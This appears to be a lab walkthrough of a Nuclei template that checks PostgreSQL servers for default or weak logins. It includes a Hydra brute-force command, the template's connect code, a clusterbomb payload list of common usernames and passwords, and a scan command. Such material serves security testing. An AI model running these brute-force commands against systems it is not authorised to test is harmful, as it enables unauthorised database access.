PostgreSQL services configured with default or weak credentials present a significant security risk. Attackers can exploit these misconfigurations to gain unauthorized access, extract sensitive data, modify records, or execute arbitrary SQL commands.
- PostgreSQL Password Authentication
- PostgreSQL Authentication Documentation
- Common Default PostgreSQL Credentials
- Execute the following commands to start a PostgreSQL server
docker-compose up -dOnce the server starts, PostgreSQL will be accessible on port 5432 with default credentials (postgres:postgres).
-
Brute-Force Authentication using Hydra with common credentials
hydra -C <wordlist> <target-ip> postgres
Pre-Condition Check
pre-condition: |
var m = require("nuclei/postgres");
var c = m.PGClient();
c.IsPostgres(Host, Port);- Ensures the PostgreSQL service is running before attempting authentication.
JavaScript Execution Block
code: |
var m = require("nuclei/postgres");
var c = m.postgres();
c.Connect(Host, Port, User, Pass);- Loads the PostgreSQL module for Nuclei.
- Initializes a PostgreSQL client.
- Attempts to authenticate using various username and password combinations.
Define Target Arguments
args:
Host: "{{Host}}"
Port: "5432"
User: "{{usernames}}"
Pass: "{{passwords}}"- Specifies the target host and PostgreSQL service port (default: 5432).
- Uses a predefined list of common usernames and passwords.
Attack Mode
attack: clusterbomb- This mode systematically tests all combinations of usernames and passwords.
Payloads
payloads:
usernames:
- "postgres"
- "admin"
passwords:
- "password"
- "secret"
- "admin"
- "postgres"- Uses commonly found weak credentials.
Stopping Execution on First Match
stop-at-first-match: true- Terminates the scan once valid credentials are discovered.
Nuclei Template URL : postgres-default-logins
nuclei -id postgres-default-logins -u localhost -vv